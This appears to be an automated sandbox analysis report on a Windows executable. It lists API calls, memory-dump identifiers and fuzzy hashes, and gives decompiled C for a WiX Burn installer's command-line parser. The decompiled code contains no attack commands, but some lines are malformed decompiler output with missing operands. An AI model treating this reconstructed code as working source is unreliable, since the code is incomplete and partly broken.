                                                                                                                                                                  • EnumWindows.USER32(10019430,00000000), ref: 1001971A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1129996299-0
                                                                                                                                                                  • Opcode ID: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
                                                                                                                                                                  • Instruction ID: b52a782fc5a630541d4b441021bffe907a2dd7d3096b3a676bb7090c7594124f
                                                                                                                                                                  • Opcode Fuzzy Hash: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
                                                                                                                                                                  • Instruction Fuzzy Hash: 93B01230140329A7D2009795DCCAF4577BCF354A18F520001F70C4A6A2CB71B4528555
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000EC31, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E100152B4();
				_push(_a4);
				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                                  0x1000ec31
                                                                                                                                                                  0x1000ec36
                                                                                                                                                                  0x1000ec42
                                                                                                                                                                  0x1000ec48

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___security_init_cookie.LIBCMT ref: 1000EC31
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___security_init_cookie
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3657697845-0
                                                                                                                                                                  • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction ID: e6deafa1040a52db75f664394f4ca8d863cdd32d4507f565b6a3541a6f58ca8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B0923A10A340EB8204CB20D482C0FB3A2EBD4311F24C90DF8A61A2558B31EC60EA52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042817B, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,00427EC2,?,?), ref: 0042823F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                  • Instruction ID: e9a9c8823eef9d043f019c78c05d285ff164f876fe23e450a0f707fc6d195a7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D41DEB4A01209DFCB08CF84D990EAEB7B1FF88304F208599E915AB355D734EE51CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00410095, Relevance: 177.6, APIs: 47, Strings: 54, Instructions: 862stringCOMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00410095(void* __ecx, intOrPtr* _a4, int* _a8, intOrPtr _a12, intOrPtr _a16, int* _a20, int* _a24, int* _a28, int* _a32, signed int* _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				int _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				int _t188;
				int* _t189;
				int* _t190;
				void* _t191;
				signed int _t195;
				int* _t208;
				int _t241;
				int _t280;
				int _t286;
				int _t308;
				WCHAR* _t309;
				int _t316;
				int _t321;
				short* _t322;
				int _t323;
				signed int _t329;
				signed short* _t330;
				int* _t357;
				signed int _t360;
				int _t366;
				signed short _t373;
				intOrPtr* _t377;
				signed int _t379;
				signed int _t380;
				intOrPtr* _t382;
				signed short* _t383;
				int* _t386;
				int* _t387;
				int _t388;
				void* _t391;
				intOrPtr* _t394;
				intOrPtr* _t395;
				int* _t396;
				intOrPtr* _t397;
				int* _t398;
				int _t401;
				intOrPtr _t402;
				intOrPtr _t403;
				signed int _t404;
				int _t405;
				void* _t410;
				int _t411;
				void* _t415;

				_t401 = 0;
				_t377 = _a4;
				_t188 = 0;
				_t410 = 0;
				_t405 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_t377 == 0 ||  *_t377 == 0) {
					L10:
					_t379 = 1;
					if(_t188 <= 1) {
						L131:
						_t189 = _a20;
						if( *_t189 == 3) {
							L147:
							if( *_t189 != 2) {
								L135:
								_t190 = _a8;
								L136:
								if( *_t190 == _t401) {
									 *_t190 = 4;
								}
								if(_t190[1] == _t401) {
									_t190[1] = 4;
								}
								if(_t190[2] == _t401) {
									_t190[2] = 2;
								}
								goto L142;
							}
							_t190 = _a8;
							_t190[1] = 1;
							goto L136;
						}
						_t382 = _a28;
						if( *_t382 == 2 ||  *_t382 == 3) {
							 *_t189 = 1;
							goto L135;
						} else {
							goto L147;
						}
					} else {
						_t402 = 0x2f;
						_a4 = 0x2d;
						_v20 = _t402;
						while(1) {
							_t383 =  *(_t410 + _t379 * 4);
							_t195 =  *_t383 & 0x0000ffff;
							if(_t195 == _a4 || _t195 == _t402) {
								goto L14;
							}
							L109:
							E004312A7( &(_a8[3]),  *(_t410 + _t379 * 4));
							L117:
							_t401 = 0;
							L118:
							_t379 = _t379 + 1;
							if(_t379 >= _v8) {
								goto L131;
							}
							_t402 = 0x2f;
							continue;
							L14:
							_t16 =  &(_t383[1]); // 0x402241
							if(CompareStringW(0x7f, 1, _t16, 0xffffffff, "l", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"log", 0xffffffff) == 2) {
								_t198 = _a36;
								 *_a36 =  *_a36 & 0xfffffffe;
								_t379 = _t379 + 1;
								if(_t379 >= _v8) {
									_t411 = 0x80070057;
									E004300D9(_t198, "core.cpp", 0x399, 0x80070057);
									_push("Must specify a path for log.");
									goto L127;
								}
								_t405 = E00433F88(_a40,  *(_t410 + _t379 * 4), 0);
								if(_t405 < 0) {
									_push("Failed to copy log file path.");
									goto L103;
								}
								goto L117;
							} else {
								if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "?", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "h", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"help", 0xffffffff) == 2) {
									_t208 = _a8;
									goto L95;
								} else {
									if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "q", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"quiet", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "s", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"silent", 0xffffffff) == 2) {
										_t386 = _a8;
										_t401 = 0;
										 *(_t386 + 4) = 2;
										if( *(_t386 + 8) == 0) {
											 *(_t386 + 8) = 3;
										}
										goto L118;
									} else {
										if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"passive", 0xffffffff) != 2) {
											if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"norestart", 0xffffffff) != 2) {
												if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"forcerestart", 0xffffffff) != 2) {
													if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"promptrestart", 0xffffffff) != 2) {
														_t241 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"layout", 0xffffffff);
														_t403 = 2;
														if(_t241 != _t403) {
															if(CompareStringW(0x7f, 1,  *(_t410 + _t379 * 4) + _t403, 0xffffffff, L"uninstall", 0xffffffff) != 2) {
																if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"repair", 0xffffffff) != 2) {
																	if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"modify", 0xffffffff) != 2) {
																		if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"package", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"update", 0xffffffff) == 2) {
																			_t387 = _a8;
																			_t401 = 0;
																			if( *_t387 == 0) {
																				 *_t387 = 4;
																			}
																		} else {
																			if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"noaupause", 0xffffffff) != 2) {
																				if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"keepaupaused", 0xffffffff) != 2) {
																					if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"parent", 0xffffffff) != 2) {
																						if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"parent:none", 0xffffffff) != 2) {
																							if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.log.append", 0xffffffff) != 2) {
																								if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.elevated", 0xffffffff) != 2) {
																									if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.unelevated", 0xffffffff) != 2) {
																										_t280 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.embedded", 0xffffffff);
																										_t388 = 2;
																										if(_t280 != _t388) {
																											if(CompareStringW(0x7f, 1,  *(_t410 + _t379 * 4) + _t388, 0xffffffff, L"burn.related.detect", 0xffffffff) != 2) {
																												_t286 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.upgrade", 0xffffffff);
																												_push(2);
																												_pop(1);
																												if(_t286 == 1) {
																													L81:
																													_a8[7] = 1;
																													_push(E0040E82A(1));
																													_push(0x20000003);
																													L82:
																													_push(2);
																													E00402003();
																													_t415 = _t415 + 0xc;
																													goto L117;
																												}
																												if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[0]), 0xffffffff, L"burn.related.addon", 0xffffffff) != 2) {
																													if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.patch", 0xffffffff) != 2) {
																														if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.update", 0xffffffff) != 2) {
																															if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.passthrough", 0xffffffff) != 2) {
																																if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.disable.unelevate", 0xffffffff) != 2) {
																																	if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.runonce", 0xffffffff) != 2) {
																																		_t308 = lstrlenW(L"burn.ignoredependencies");
																																		_t309 = L"burn.ignoredependencies";
																																		if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), lstrlenW(_t309), _t309, _t308) != 2) {
																																			_t316 = lstrlenW( &(( *(_t410 + _t379 * 4))[1]));
																																			if(_t316 < lstrlenW(L"burn.")) {
																																				_t410 = _v16;
																																				goto L109;
																																			}
																																			_t321 = lstrlenW(L"burn.");
																																			_t322 = L"burn.";
																																			_t323 = lstrlenW(_t322);
																																			_t410 = _v16;
																																			if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), _t323, _t322, _t321) != 2) {
																																				goto L109;
																																			}
																																			_push( &(( *(_t410 + _t379 * 4))[1]));
																																			_push(0xa0000002);
																																			goto L82;
																																		}
																																		_t329 = lstrlenW(L"burn.ignoredependencies");
																																		_t330 =  &(( *(_t410 + _t379 * 4))[_t329]);
																																		_t391 = 0x3d;
																																		if(_t391 != _t330[1] || 0 ==  *_t330) {
																																			E004300D9(_t330, "core.cpp", 0x480, 0x80070057);
																																			_t405 = 0x80070057;
																																			E00430A57(0x80070057, "Missing required parameter for switch: %ls", L"burn.ignoredependencies");
																																			goto L142;
																																		} else {
																																			_t405 = E00433F88(_a48, _t330, 0);
																																			if(_t405 >= 0) {
																																				goto L117;
																																			}
																																			_push("Failed to allocate the list of dependencies to ignore.");
																																			L103:
																																			_push(_t405);
																																			L104:
																																			E00430A57();
																																			L142:
																																			_t191 = _v16;
																																			if(_t191 != 0) {
																																				LocalFree(_t191);
																																			}
																																			goto L144;
																																		}
																																	}
																																	 *_a20 = 3;
																																	goto L117;
																																}
																																_t208 = _a32;
																																L95:
																																 *_t208 = 1;
																																goto L117;
																															}
																															_a8[8] = 1;
																															goto L117;
																														}
																														_push(6);
																														L86:
																														_pop(1);
																														goto L81;
																													}
																													_push(4);
																													goto L86;
																												}
																												_push(3);
																												goto L86;
																											}
																											goto L81;
																										}
																										_t117 = _t379 + 3; // 0x402286
																										_t336 = _t117;
																										if(_t117 >= _v8) {
																											_t411 = 0x80070057;
																											E004300D9(_t336, "core.cpp", 0x444, 0x80070057);
																											_push("Must specify the embedded name, token and parent process id.");
																											L127:
																											_t405 = _t411;
																											_push(_t411);
																											goto L104;
																										}
																										_t380 = _t379 + 1;
																										 *_a20 = _t388;
																										_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a16);
																										if(_t405 >= 0) {
																											L70:
																											_t379 = _t380 + 2;
																											goto L117;
																										}
																										_push("Failed to parse embedded connection.");
																										goto L103;
																									}
																									_t109 = _t379 + 3; // 0x402286
																									_t341 = _t109;
																									if(_t109 >= _v8) {
																										_t411 = 0x80070057;
																										E004300D9(_t341, "core.cpp", 0x434, 0x80070057);
																										_push("Must specify the unelevated name, token and parent process id.");
																										goto L127;
																									}
																									_t380 = _t379 + 1;
																									 *_a28 = 1;
																									_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a12);
																									if(_t405 >= 0) {
																										goto L70;
																									}
																									_push("Failed to parse unelevated connection.");
																									goto L103;
																								}
																								_t101 = _t379 + 3; // 0x402286
																								_t346 = _t101;
																								if(_t101 >= _v8) {
																									_t411 = 0x80070057;
																									E004300D9(_t346, "core.cpp", 0x424, 0x80070057);
																									_push("Must specify the elevated name, token and parent process id.");
																									goto L127;
																								}
																								_t380 = _t379 + 1;
																								 *_a28 = 3;
																								_t405 = E00410B39(_t403, _t410 + _t380 * 4, _a12);
																								if(_t405 < 0) {
																									_push("Failed to parse elevated connection.");
																									goto L103;
																								}
																								goto L70;
																							}
																							_t379 = _t379 + 1;
																							if(_t379 >= _v8) {
																								_t411 = 0x80070057;
																								E004300D9(_t271, "core.cpp", 0x416, 0x80070057);
																								_push("Must specify a path for append log.");
																								goto L127;
																							}
																							_t405 = E00433F88(_a40,  *(_t410 + _t379 * 4), 0);
																							if(_t405 < 0) {
																								_push("Failed to copy append log file path.");
																								goto L103;
																							}
																							 *_a36 =  *_a36 | 0x00000001;
																							goto L117;
																						}
																						_t405 = E00433F88(_a44, 0x43b580, 0);
																						if(_t405 >= 0) {
																							goto L117;
																						}
																						_push("Failed to initialize parent to none.");
																						goto L103;
																					}
																					_t379 = _t379 + 1;
																					if(_t379 >= _v8) {
																						_t411 = 0x80070057;
																						E004300D9(_t265, "core.cpp", 0x405, 0x80070057);
																						_push("Must specify a value for parent.");
																						goto L127;
																					}
																					_t405 = E00433F88(_a44,  *(_t410 + _t379 * 4), 0);
																					if(_t405 >= 0) {
																						goto L117;
																					}
																					_push("Failed to copy parent.");
																					goto L103;
																				}
																				_t357 = _a24;
																				_t401 = 0;
																				if( *_t357 != 0) {
																					 *_t357 = 2;
																				}
																				goto L118;
																			}
																			_t401 = 0;
																			 *_a24 = 0;
																		}
																		goto L118;
																	}
																	_t394 = _a8;
																	_t401 = 0;
																	if( *_t394 != 1) {
																		 *_t394 = 5;
																	}
																	goto L118;
																}
																_t395 = _a8;
																_t401 = 0;
																if( *_t395 != 1) {
																	 *_t395 = 6;
																}
																goto L118;
															}
															_t396 = _a8;
															_t401 = 0;
															if( *_t396 != 1) {
																 *_t396 = 3;
															}
															goto L118;
														}
														_t397 = _a8;
														if( *_t397 != 1) {
															 *_t397 = _t403;
														}
														_t54 = _t379 + 1; // 0x402284
														_t404 = _t54;
														if(_t404 >= _v8) {
															goto L117;
														} else {
															_t360 =  *( *(_t410 + 4 + _t379 * 4)) & 0x0000ffff;
															if(_t360 == _a4 || _t360 == _v20) {
																goto L117;
															} else {
																_t379 = _t404;
																_t405 = E0043191F(_t397 + 0x24,  *(_t410 + _t379 * 4), 3);
																if(_t405 >= 0) {
																	goto L117;
																}
																_push("Failed to copy path for layout directory.");
																goto L103;
															}
														}
													}
													_a8[2] = 2;
													goto L117;
												}
												_a8[2] = 4;
												goto L117;
											}
											_a8[2] = 1;
											goto L117;
										} else {
											_t398 = _a8;
											_t401 = 0;
											_t366 = 3;
											_t398[1] = _t366;
											if(_t398[2] == 0) {
												_t398[2] = _t366;
											}
											goto L118;
										}
									}
								}
							}
						}
					}
				} else {
					if(E00433C35(__ecx,  &_v12, L"ignored ", 0) >= 0) {
						_t405 = E00433C35(__ecx,  &_v12, _t377, 0);
						if(_t405 >= 0) {
							_t410 = CommandLineToArgvW(_v12,  &_v8);
							_v16 = _t410;
							if(_t410 != 0) {
								_t188 = _v8;
								_t401 = 0;
								goto L10;
							} else {
								_t373 = GetLastError();
								_t409 =  <=  ? _t373 : _t373 & 0x0000ffff | 0x80070000;
								_t405 =  >=  ? 0x80004005 :  <=  ? _t373 : _t373 & 0x0000ffff | 0x80070000;
								E004300D9(0x80004005, "core.cpp", 0x389, _t405);
								_push("Failed to get command line.");
								goto L4;
							}
						} else {
							_push("Failed to copy command line.");
							goto L4;
						}
					} else {
						_push("Failed to initialize command line.");
						L4:
						_push(_t405);
						E00430A57();
						L144:
						if(_v12 != 0) {
							E004380AB(_v12);
						}
						return _t405;
					}
				}
			}


















































                                                                                                                                                                  0x0041009b
                                                                                                                                                                  0x0041009e
                                                                                                                                                                  0x004100a2
                                                                                                                                                                  0x004100a4
                                                                                                                                                                  0x004100a7
                                                                                                                                                                  0x004100a9
                                                                                                                                                                  0x004100ac
                                                                                                                                                                  0x004100af
                                                                                                                                                                  0x004100b4
                                                                                                                                                                  0x00410153
                                                                                                                                                                  0x00410155
                                                                                                                                                                  0x00410158
                                                                                                                                                                  0x00410ac3
                                                                                                                                                                  0x00410ac3
                                                                                                                                                                  0x00410ac9
                                                                                                                                                                  0x00410b28
                                                                                                                                                                  0x00410b2b
                                                                                                                                                                  0x00410ade
                                                                                                                                                                  0x00410ade
                                                                                                                                                                  0x00410ae1
                                                                                                                                                                  0x00410ae3
                                                                                                                                                                  0x00410ae5
                                                                                                                                                                  0x00410ae5
                                                                                                                                                                  0x00410aee
                                                                                                                                                                  0x00410af0
                                                                                                                                                                  0x00410af0
                                                                                                                                                                  0x00410afa
                                                                                                                                                                  0x00410afc
                                                                                                                                                                  0x00410afc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410afa
                                                                                                                                                                  0x00410b2d
                                                                                                                                                                  0x00410b30
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410b30
                                                                                                                                                                  0x00410acb
                                                                                                                                                                  0x00410ad1
                                                                                                                                                                  0x00410ad8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041015e
                                                                                                                                                                  0x00410160
                                                                                                                                                                  0x00410161
                                                                                                                                                                  0x00410168
                                                                                                                                                                  0x0041016b
                                                                                                                                                                  0x0041016b
                                                                                                                                                                  0x0041016e
                                                                                                                                                                  0x00410175
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410949
                                                                                                                                                                  0x00410953
                                                                                                                                                                  0x004109b4
                                                                                                                                                                  0x004109b4
                                                                                                                                                                  0x004109b6
                                                                                                                                                                  0x004109b6
                                                                                                                                                                  0x004109ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004109c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410180
                                                                                                                                                                  0x00410189
                                                                                                                                                                  0x0041019a
                                                                                                                                                                  0x0041098d
                                                                                                                                                                  0x00410990
                                                                                                                                                                  0x00410993
                                                                                                                                                                  0x00410997
                                                                                                                                                                  0x00410aa7
                                                                                                                                                                  0x00410ab7
                                                                                                                                                                  0x00410abc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410abc
                                                                                                                                                                  0x004109aa
                                                                                                                                                                  0x004109ae
                                                                                                                                                                  0x00410a9d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a9d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004101c3
                                                                                                                                                                  0x004101e0
                                                                                                                                                                  0x00410985
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041022c
                                                                                                                                                                  0x00410249
                                                                                                                                                                  0x0041096b
                                                                                                                                                                  0x0041096e
                                                                                                                                                                  0x00410970
                                                                                                                                                                  0x0041097a
                                                                                                                                                                  0x0041097c
                                                                                                                                                                  0x0041097c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102b8
                                                                                                                                                                  0x004102d5
                                                                                                                                                                  0x00410310
                                                                                                                                                                  0x0041033e
                                                                                                                                                                  0x0041036c
                                                                                                                                                                  0x00410391
                                                                                                                                                                  0x00410399
                                                                                                                                                                  0x0041039c
                                                                                                                                                                  0x0041040f
                                                                                                                                                                  0x00410447
                                                                                                                                                                  0x0041047f
                                                                                                                                                                  0x004104b7
                                                                                                                                                                  0x0041095a
                                                                                                                                                                  0x0041095d
                                                                                                                                                                  0x00410961
                                                                                                                                                                  0x00410963
                                                                                                                                                                  0x00410963
                                                                                                                                                                  0x004104e0
                                                                                                                                                                  0x004104fd
                                                                                                                                                                  0x00410528
                                                                                                                                                                  0x0041055f
                                                                                                                                                                  0x004105a9
                                                                                                                                                                  0x004105eb
                                                                                                                                                                  0x00410636
                                                                                                                                                                  0x00410689
                                                                                                                                                                  0x004106d1
                                                                                                                                                                  0x004106d9
                                                                                                                                                                  0x004106dc
                                                                                                                                                                  0x0041072c
                                                                                                                                                                  0x00410766
                                                                                                                                                                  0x0041076c
                                                                                                                                                                  0x0041076e
                                                                                                                                                                  0x00410771
                                                                                                                                                                  0x00410731
                                                                                                                                                                  0x00410735
                                                                                                                                                                  0x0041073d
                                                                                                                                                                  0x0041073e
                                                                                                                                                                  0x00410743
                                                                                                                                                                  0x00410743
                                                                                                                                                                  0x00410745
                                                                                                                                                                  0x0041074a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041074a
                                                                                                                                                                  0x0041078f
                                                                                                                                                                  0x004107b3
                                                                                                                                                                  0x004107d6
                                                                                                                                                                  0x004107f9
                                                                                                                                                                  0x00410827
                                                                                                                                                                  0x00410854
                                                                                                                                                                  0x00410869
                                                                                                                                                                  0x00410870
                                                                                                                                                                  0x00410892
                                                                                                                                                                  0x004108ed
                                                                                                                                                                  0x00410902
                                                                                                                                                                  0x00410946
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410946
                                                                                                                                                                  0x0041090f
                                                                                                                                                                  0x00410912
                                                                                                                                                                  0x00410919
                                                                                                                                                                  0x0041091b
                                                                                                                                                                  0x00410933
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041093b
                                                                                                                                                                  0x0041093c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041093c
                                                                                                                                                                  0x00410899
                                                                                                                                                                  0x004108a4
                                                                                                                                                                  0x004108a7
                                                                                                                                                                  0x004108ac
                                                                                                                                                                  0x00410a81
                                                                                                                                                                  0x00410a91
                                                                                                                                                                  0x00410a93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004108c0
                                                                                                                                                                  0x004108ca
                                                                                                                                                                  0x004108ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004108d4
                                                                                                                                                                  0x004108d9
                                                                                                                                                                  0x004108d9
                                                                                                                                                                  0x004108da
                                                                                                                                                                  0x004108da
                                                                                                                                                                  0x00410b03
                                                                                                                                                                  0x00410b03
                                                                                                                                                                  0x00410b08
                                                                                                                                                                  0x00410b0b
                                                                                                                                                                  0x00410b0b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410b08
                                                                                                                                                                  0x004108ac
                                                                                                                                                                  0x00410859
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410859
                                                                                                                                                                  0x00410829
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041082c
                                                                                                                                                                  0x004107fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004107fe
                                                                                                                                                                  0x004107d8
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410793
                                                                                                                                                                  0x004107b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004107b5
                                                                                                                                                                  0x00410791
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410791
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410730
                                                                                                                                                                  0x004106de
                                                                                                                                                                  0x004106de
                                                                                                                                                                  0x004106e4
                                                                                                                                                                  0x00410a4f
                                                                                                                                                                  0x00410a5f
                                                                                                                                                                  0x00410a64
                                                                                                                                                                  0x00410a69
                                                                                                                                                                  0x00410a69
                                                                                                                                                                  0x00410a6b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a6b
                                                                                                                                                                  0x004106f0
                                                                                                                                                                  0x004106f1
                                                                                                                                                                  0x004106fc
                                                                                                                                                                  0x00410700
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410664
                                                                                                                                                                  0x00410706
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410706
                                                                                                                                                                  0x0041068b
                                                                                                                                                                  0x0041068b
                                                                                                                                                                  0x00410691
                                                                                                                                                                  0x00410a33
                                                                                                                                                                  0x00410a43
                                                                                                                                                                  0x00410a48
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410a48
